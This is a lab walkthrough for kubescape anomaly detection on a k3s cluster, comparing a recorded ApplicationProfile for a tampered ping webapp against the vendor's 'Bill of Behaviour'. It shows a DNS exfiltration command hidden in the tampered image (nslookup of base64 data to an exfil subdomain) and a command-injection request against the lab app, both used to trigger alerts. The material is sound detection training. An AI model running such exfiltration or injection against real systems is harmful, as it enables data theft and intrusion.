Consume the app on client cluster

THIS PART WILL SHOW HOW KUBESCAPE WORKS FOR THE CUSTOMER DURING BOBTEST

Pretending we are now the consumer/user of webapp, we have our own infrastructure. This consumer uses k3s, which is another slim Kubernetes flavour from a different vendor than k0s.

We'll cover the following:

  • Get to know our k3s installation
  • Deploy kubescape in a slightly different config to give us anomaly detection
  • Follow the 2-step installation process
  • Watch it for the two types of anomalies

0 Clone repo

Again, let's clone the same repo; this is a fresh playground:

git clone https://github.com/k8sstormcenter/honeycluster.git
cd honeycluster
git checkout 152-implement-bill-of-behaviour-demo-lab

1 Install kubescape and wait until it's up and running

make kubescape-bob-kind
kubectl get pods -n honey -l app.kubernetes.io/instance=kubescape

You want the STATUS of all pods to be Running, like so:

laborant@dev-machine:webapp_t$ kubectl get pods -n honey -l app.kubernetes.io/instance=kubescape
NAME                                READY   STATUS    RESTARTS   AGE
grype-offline-db-579c6cbc47-rvgqk   1/1     Running   0          20m
node-agent-b4qmg                    2/2     Running   0          20m
node-agent-tgs8f                    2/2     Running   0          20m
node-agent-vslk6                    2/2     Running   0          20m
operator-559b868885-kr8dt           1/1     Running   0          20m
storage-79d6fd9785-gdpx2            1/1     Running   0          20m

Check out the Explorer tab, then navigate to All Objects, expand it, hover and toggle the 👁️ icon on spdx.softwarecomposition.kubescape.io/v1beta1 -> ApplicationProfile, then navigate to Watched Objects at the bottom. You are now watching these Application Profiles and no longer need to filter.

2 pull down artefact (not yet implemented)

WIP: DO NOT EXECUTE THIS LINE

bobctl install webapp

We will simply use our images k8sstormcenter/webapp:latest and k8sstormcenter/webapp-t:latest, which are multi-arch reproductions of docker.io/amitschendel/ping-app:latest, with -t meaning it was tampered with. Their Dockerfiles (and GitHub workflows) are at:

https://github.com/k8sstormcenter/honeycluster/blob/152-implement-bill-of-behaviour-demo-lab/.github/workflows/publish-image-kubescape-webapp.yml

3 deploy artefact (first without tampering)

OK, now we pretend to simply install that webapp image, which we as the customer believe is the correct one.

So, this is (or will be) the exact same artefact as in Module 1, just on a different tech stack now:

cd traces/kubescape-verify/attacks/webapp/
chmod +x setup.sh
./setup.sh

4 Use the artefact in a functional, benign way

So, again, we do almost the same things.

This app was made for pinging, so we ping.

Open a new terminal tab and let's ping:

curl localhost:8080/ping.php?ip=172.16.0.2

If that works, let it loop:

while true; do curl localhost:8080/ping.php?ip=172.16.0.2; sleep 10; done

Do not kill the loop. Please switch back to the original dev-machine tab and proceed.

5 Wait for kubescape to settle

TODO: replace with a more production-like method.

We'll wait until we have an application profile again and then throw it away. This is not required if you use exactly the same everything on this Kubernetes as you did as the vendor, i.e. if the template hash matches you don't need to delete it.

Let's check the configuration in order to understand if the setup is any different from Module 1:

kubectl describe cm -n honey ks-cloud-config
kubectl describe RuntimeRuleAlertBinding all-rules-all-pods
kubectl get applicationProfile -A

laborant@dev-machine:webapp_t$ kubectl get applicationProfile -A
NAMESPACE   NAME                           CREATED AT
default     replicaset-webapp-75c688bfc4   2025-04-25T12:38:28Z

export rs=$(kubectl get replicaset -n default -o jsonpath='{.items[0].metadata.name}')
kubectl describe applicationprofile replicaset-$rs
kubectl get applicationProfile replicaset-$rs -o yaml > ~/originalappprofile.yaml

Now edit that profile (so it keeps its name), but use the content of the one from Module 1:

python3 bob.py 

which is equivalent to manually substituting and patching:

echo $rs
envsubst < /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_applicationprofile_restart.yaml > /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_restart.yaml

Patch the ping profile (this may or may not be necessary):

kubectl delete applicationprofile replicaset-$rs
kubectl apply -f /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_restart.yaml

Make sure you didn't wake the dragon (kubescape):

kubectl logs -n honey -l app=node-agent

There should be no additional logs, only the stop of the above profile, similar to:

{"level":"info","ts":"2025-04-25T16:25:13Z","msg":"RBCache - ruleBinding added/modified","name":"/all-rules-all-pods"}
{"level":"info","ts":"2025-04-25T17:05:15Z","msg":"start monitor on container","container ID":"d4d78869d6b20066565d10c39fa37d1c6d3d5d83161b4d7b3d75783d53653ae8","k8s workload":"default/webapp-8b697d7f9-h9mx4/ping-app","ContainerImageDigest":"sha256:31eb54dc4f5e3537a807e1a5cbc2de9d6c0a5f4e423a5137627e664748f03d7f","ContainerImageName":"ghcr.io/k8sstormcenter/webapp:latest"}
{"level":"info","ts":"2025-04-25T17:10:15Z","msg":"stop monitor on container - monitoring time ended","container ID":"d4d78869d6b20066565d10c39fa37d1c6d3d5d83161b4d7b3d75783d53653ae8","k8s workload":"default/webapp-8b697d7f9-h9mx4/ping-app"}

Quick Summary:

We as the customer deployed webapp, we didn't check its signature, we recorded a profile and threw that profile away by overwriting it with the profile from Module 1, aka the BoB.

6 watch how k3s is different from k8s BOB-MERGE

We are still simulating the benign traffic using the loop. TODO C: use the bob-test deployment instead. It's already in git.

We already see one interesting log and notice that there is one syscall that differs between k8s and k3s: gettid.

7 Discuss what happens if the profile is missing the shutdown

Open a third terminal and:

kubectl logs -n honey -l app=node-agent --tail=-1 -f

Back in another terminal:

export pod=$(kubectl get pod -n default -o jsonpath='{.items[0].metadata.name}')
kubectl get pod $pod
kubectl delete pod $pod

Switch to the logs tab.

Again, it is re-recording the profile:

{"level":"info","ts":"2025-04-25T20:24:06Z","msg":"start monitor on container","container ID":"6f95b220e4e1b06b391c98409682064cf7e9115286792f139c6ca52221a23b85","k8s workload":"default/webapp-8b697d7f9-hxz4v/ping-app","ContainerImageDigest":"sha256:efbbeae81bb8af21288cdda8f0f3de900b73dad19b380937b7374965ee41957f","ContainerImageName":"ghcr.io/k8sstormcenter/webapp:latest"}
{"level":"info","ts":"2025-04-25T20:24:07Z","msg":"stop monitor on container - container has terminated","container ID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","k8s workload":"default/webapp-8b697d7f9-wr5s8/ping-app"}

What we see is that we didn't do a rollout restart, but a pod delete:

{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"gettid"},"infectedPID":4183,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-25T20:21:33.310968529Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","podName":"webapp-8b697d7f9-wr5s8","podNamespace":"default","workloadName":"webapp","workloadNamespace":"default","workloadKind":"Deployment"},"RuntimeProcessDetails":{"processTree":{"pid":4183,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":3927,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},"containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"event":{"runtime":{"runtimeName":"containerd","containerId":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"k8s":{"node":"node-01","namespace":"default","podName":"webapp-8b697d7f9-wr5s8","podLabels":{"app":"webapp","pod-template-hash":"8b697d7f9"},"containerName":"ping-app","owner":{}},"timestamp":1745612493310968529,"type":"normal"},"level":"error","message":"Unexpected system call: gettid","msg":"Unexpected system call","time":"2025-04-25T20:21:33Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"tkill"},"infectedPID":4183,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-25T20:21:33.313413767Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","podName":"webapp-8b697d7f9-wr5s8","podNamespace":"default","workloadName":"webapp","workloadNamespace":"default","workloadKind":"Deployment"},"RuntimeProcessDetails":{"processTree":{"pid":4183,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":3927,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},"containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"event":{"runtime":{"runtimeName":"containerd","containerId":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"k8s":{"node":"node-01","namespace":"default","podName":"webapp-8b697d7f9-wr5s8","podLabels":{"app":"webapp","pod-template-hash":"8b697d7f9"},"containerName":"ping-app","owner":{}},"timestamp":1745612493313413767,"type":"normal"},"level":"error","message":"Unexpected system call: tkill","msg":"Unexpected system call","time":"2025-04-25T20:21:33Z"}

But again, these are just events related to the delete action.
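To separate this kind of shutdown noise from alerts that deserve a look, here is an added Python example (not part of the lab and not kubescape code) that parses node-agent log lines like the ones above and labels each alert by whether the same container terminated within a few minutes of it; the log excerpt is constructed, with fields trimmed and container IDs shortened.

```python
import json
from datetime import datetime, timedelta

# Constructed excerpt of `kubectl logs -n honey -l app=node-agent`, modelled on
# the lines shown above (fields trimmed, container IDs shortened and made up).
NODE_AGENT_LOG = r'''
{"level":"info","ts":"2025-04-25T20:24:06Z","msg":"start monitor on container","container ID":"6f95b220","k8s workload":"default/webapp-8b697d7f9-hxz4v/ping-app"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"gettid"}},"RuleID":"R0003","RuntimeK8sDetails":{"containerID":"c0cbad96","podName":"webapp-8b697d7f9-wr5s8","workloadName":"webapp"},"level":"error","message":"Unexpected system call: gettid","time":"2025-04-25T20:21:33Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"tkill"}},"RuleID":"R0003","RuntimeK8sDetails":{"containerID":"c0cbad96","podName":"webapp-8b697d7f9-wr5s8","workloadName":"webapp"},"level":"error","message":"Unexpected system call: tkill","time":"2025-04-25T20:21:33Z"}
{"level":"info","ts":"2025-04-25T20:24:07Z","msg":"stop monitor on container - container has terminated","container ID":"c0cbad96","k8s workload":"default/webapp-8b697d7f9-wr5s8/ping-app"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/nsswitch.conf"}},"RuleID":"R0002","RuntimeK8sDetails":{"containerID":"6f95b220","podName":"webapp-8b697d7f9-hxz4v","workloadName":"webapp"},"level":"error","message":"Unexpected file access: /etc/nsswitch.conf with flags O_RDONLY,O_CLOEXEC","time":"2025-04-25T20:31:12Z"}
not-json noise line that kubectl may interleave
'''

# How far apart an alert and a "container has terminated" message for the same
# container may be and still be treated as one shutdown. In the lines above the
# gettid/tkill alerts landed about 2.5 minutes before the stop message, so the
# default window is deliberately generous; tune it for your own cluster.
SHUTDOWN_WINDOW = timedelta(minutes=5)
TERMINATED_MSG = "stop monitor on container - container has terminated"


def _ts(value):
    """node-agent writes whole-second UTC timestamps in both record types."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def parse_log(text):
    """Split the log into lifecycle events (start/stop monitor, keyed by
    'container ID') and rule alerts (carry a 'RuleID'); skip anything else."""
    lifecycle, alerts = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if "RuleID" in rec:
            alerts.append(rec)
        elif "container ID" in rec:
            lifecycle.append(rec)
    return lifecycle, alerts


def triage(text, window=SHUTDOWN_WINDOW):
    """Verdict per alert: 'shutdown-noise' if the same container has a
    'container has terminated' event within `window`, else 'investigate'."""
    lifecycle, alerts = parse_log(text)
    stops = {}
    for ev in lifecycle:
        if ev.get("msg") == TERMINATED_MSG:
            stops.setdefault(ev["container ID"], []).append(_ts(ev["ts"]))
    rows = []
    for a in alerts:
        details = a["RuntimeK8sDetails"]
        when = _ts(a["time"])
        explained = any(abs(stop - when) <= window
                        for stop in stops.get(details["containerID"], []))
        rows.append({
            "verdict": "shutdown-noise" if explained else "investigate",
            "rule": a["RuleID"],
            "pod": details.get("podName", "?"),
            "detail": a.get("message") or a["BaseRuntimeMetadata"]["alertName"],
        })
    return rows


def summarize(text, window=SHUTDOWN_WINDOW):
    """Count alerts per (verdict, RuleID) for a quick glance."""
    counts = {}
    for row in triage(text, window):
        key = (row["verdict"], row["rule"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for row in triage(NODE_AGENT_LOG):
        print(f'{row["verdict"]:15} {row["rule"]} {row["pod"]}: {row["detail"]}')
    print(summarize(NODE_AGENT_LOG))
```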

Use the Bill of Behaviour

THIS PART WILL SHOW HOW KUBESCAPE WORKS FOR THE CUSTOMER DURING BOBTEST IF TAMPERING IS FOUND

Now with tampering.

3 deploy artefact

cd traces/kubescape-verify/attacks/webapp_t/
chmod +x setup.sh
./setup.sh

If you deployed the tampered one, notice:

    - args:
      - /bin/sh
      - -c
      - nslookup NjQgYnl0ZXMgZnJvbSAxNzIuMTYuMC4yOiBpY21wX3NlcT0zIHR0bD02MyB0aW1lPTAuNDUzIG1z.exfil.k8sstormcenter.com
        > /dev/null 2>&1
      path: /bin/sh
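An added Python example (not the lab's bob.py and not kubescape code) covering what section 5, the gettid observation in section 6 and the tampered exec just shown call for: diff the locally recorded ApplicationProfile against the vendor's BoB so that the extra syscall and the nslookup exec stand out, then build the profile to apply by keeping the local metadata and taking the BoB spec. Both profiles are constructed stand-ins for `kubectl get applicationprofile ... -o json` output; the syscalls lists and the base64 label are made up.

```python
import copy
import json

# Constructed stand-in for the profile the node-agent recorded on the client
# (k3s) cluster, with the name the local replicaset produced. The extra gettid
# syscall and the nslookup exec mirror the deltas discussed above.
LOCAL_PROFILE = json.loads("""{
  "apiVersion": "spdx.softwarecomposition.kubescape.io/v1beta1",
  "kind": "ApplicationProfile",
  "metadata": {"name": "replicaset-webapp-75c688bfc4", "namespace": "default",
               "resourceVersion": "12345",
               "annotations": {"kubescape.io/status": "completed"}},
  "spec": {"architectures": ["amd64"], "containers": [{
    "name": "ping-app", "capabilities": ["NET_RAW", "SETUID"],
    "execs": [
      {"path": "/bin/sh", "args": ["/bin/sh", "-c", "ping -c 4 172.16.0.2"]},
      {"path": "/bin/ping", "args": ["/bin/ping", "-c", "4", "172.16.0.2"]},
      {"path": "/bin/sh", "args": ["/bin/sh", "-c",
        "nslookup QUJD.exfil.k8sstormcenter.com > /dev/null 2>&1"]}],
    "opens": [{"path": "/var/www/html/ping.php", "flags": ["O_RDONLY"]}],
    "syscalls": ["read", "write", "gettid"]}]}
}""")

# Constructed stand-in for the vendor's Bill of Behaviour from Module 1
# (same content as the YAML profile shown further below, plus a syscalls list).
BOB_PROFILE = json.loads("""{
  "apiVersion": "spdx.softwarecomposition.kubescape.io/v1beta1",
  "kind": "ApplicationProfile",
  "metadata": {"name": "pod-ping-app", "namespace": "default",
               "annotations": {"kubescape.io/completion": "partial",
                               "kubescape.io/status": "completed"}},
  "spec": {"architectures": ["amd64"], "containers": [{
    "name": "ping-app", "capabilities": ["NET_RAW", "SETUID"],
    "execs": [
      {"path": "/bin/sh", "args": ["/bin/sh", "-c", "ping -c 4 172.16.0.2"]},
      {"path": "/bin/ping", "args": ["/bin/ping", "-c", "4", "172.16.0.2"]}],
    "opens": [
      {"path": "/usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0",
       "flags": ["O_CLOEXEC", "O_RDONLY"]},
      {"path": "/var/www/html/ping.php", "flags": ["O_RDONLY"]}],
    "syscalls": ["read", "write"]}]}
}""")

FIELDS = ("capabilities", "execs", "opens", "syscalls")
METADATA_KEEP = ("name", "namespace", "labels", "annotations")


def _key(field, item):
    """Hashable identity of one profile entry (open-flag order is irrelevant)."""
    if field == "execs":
        return (item.get("path", ""), tuple(item.get("args", [])))
    if field == "opens":
        return (item.get("path", ""), tuple(sorted(item.get("flags", []))))
    return item  # capabilities and syscalls are plain strings


def _entries(container, field):
    return {_key(field, x) for x in (container.get(field) or [])}


def diff_profiles(local, bob):
    """Per container and field: local_only = behaviour recorded here that the
    BoB does not allow (node-agent alerts on it once the BoB is applied),
    bob_only = allowed by the vendor but never seen on this cluster."""
    bob_by_name = {c["name"]: c for c in bob["spec"].get("containers", [])}
    report = {}
    for c in local["spec"].get("containers", []):
        b = bob_by_name.get(c["name"])
        if b is None:
            report[c["name"]] = {"missing_in_bob": True}
            continue
        fields = {}
        for f in FIELDS:
            here, there = _entries(c, f), _entries(b, f)
            if here != there:
                fields[f] = {"local_only": sorted(here - there),
                             "bob_only": sorted(there - here)}
        report[c["name"]] = fields
    return report


def merge_profile(local, bob, accept=None):
    """Profile to apply on the client: keep the locally generated metadata
    (name, namespace, labels, annotations; resourceVersion/uid are dropped so
    `kubectl apply` accepts it), take the spec from the BoB, and add the
    platform deltas you chose to tolerate, e.g. accept={"syscalls": {"gettid"}}."""
    merged = copy.deepcopy(bob)
    merged["metadata"] = {k: copy.deepcopy(local["metadata"][k])
                          for k in METADATA_KEEP if k in local["metadata"]}
    local_by_name = {c["name"]: c for c in local["spec"].get("containers", [])}
    for c in merged["spec"].get("containers", []):
        for field, allowed in (accept or {}).items():
            if field not in ("capabilities", "syscalls"):
                raise ValueError(f"accept only supports string fields, not {field}")
            seen = _entries(local_by_name.get(c["name"], {}), field)
            extra = sorted((seen & set(allowed)) - _entries(c, field))
            c[field] = list(c.get(field) or []) + extra
    return merged


if __name__ == "__main__":
    print(json.dumps(diff_profiles(LOCAL_PROFILE, BOB_PROFILE), indent=2))
    print(json.dumps(merge_profile(LOCAL_PROFILE, BOB_PROFILE,
                                   accept={"syscalls": {"gettid"}}), indent=2))
```

Pipe the second print into a file and `kubectl apply -f` it in place of bob_restart.yaml; kubectl accepts JSON manifests.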

Some Use Cases

THIS PART WILL SHOW HOW MORE ADVANCED USE CASES WORK. WIP: currently copy-pasted from Module 1, Lesson 3.

spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - NET_RAW
    - SETUID
    endpoints: null
    execs:
    - args:
      - /bin/sh
      - -c
      - ping -c 4 172.16.0.2
      path: /bin/sh
    - args:
      - /bin/ping
      - -c
      - "4"
      - 172.16.0.2
      path: /bin/ping
    imageID: docker.io/amitschendel/ping-app@sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d
    imageTag: docker.io/amitschendel/ping-app:latest
    name: ping-app
    opens:
    - flags:
      - O_CLOEXEC
      - O_RDONLY
      path: /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
    - flags:
      - O_RDONLY
      path: /var/www/html/ping.php

We want to wait until the status is completed.

If the above indicator is green, it means kubescape has reached the following event:

kubectl logs -n honey -l app=node-agent -c node-agent | grep ended
{"level":"info","ts":"2025-04-16T12:06:57Z","msg":"stop monitor on container - monitoring time ended","container ID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","k8s workload":"default/ping-app/ping-app"}

Also, in the CRD annotations you will now find the status completed. The completion is partial, which we may ignore here (according to upstream documentation it means that the app was already started when we were profiling it, but this is what we want in this case).

kubectl describe applicationprofile pod-ping-app 
...
...
Annotations:  kubescape.io/completion: partial
              kubescape.io/instance-id: apiVersion-v1/namespace-default/kind-Pod/name-ping-app
              kubescape.io/resource-size: 9
              kubescape.io/status: completed

Now we must save the above profile to disk:

kubectl get applicationprofile pod-ping-app -o yaml > pod-ping-app.yaml

Test (this will be moved into the client side)

@Peter: now I need to implement extracting this profile into YAML, attaching it to the container, signing, pushing, ... lalala. Eventually, a client will do almost the exact same thing and pull it again ... this is the sketch of the alert of malicious behaviour.

So, we are done here, but we could, just for kicks, verify that kubescape is now watching for anything that was not previously recorded as benign.

Simulate malicious runtime behaviour by executing a simple injection, like so:

In Tab 1, tail the logs again:

kubectl logs -n honey -l app=node-agent -f -c node-agent

And in Tab 2, let's do something malicious:

curl 172.16.0.2:$port/ping.php?ip=172.16.0.2,ls

In the other tab, you should now see several unexpected things:

{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/lib/x86_64-linux-gnu/libnss_files-2.31.so"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810283302Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810283302,"type":"normal"},"level":"error","message":"Unexpected file access: /lib/x86_64-linux-gnu/libnss_files-2.31.so with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/lib/x86_64-linux-gnu/libnss_dns-2.31.so"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81043552Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810435520,"type":"normal"},"level":"error","message":"Unexpected file access: /lib/x86_64-linux-gnu/libnss_dns-2.31.so with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/nsswitch.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81019379Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810193790,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/nsswitch.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/host.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810226967Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 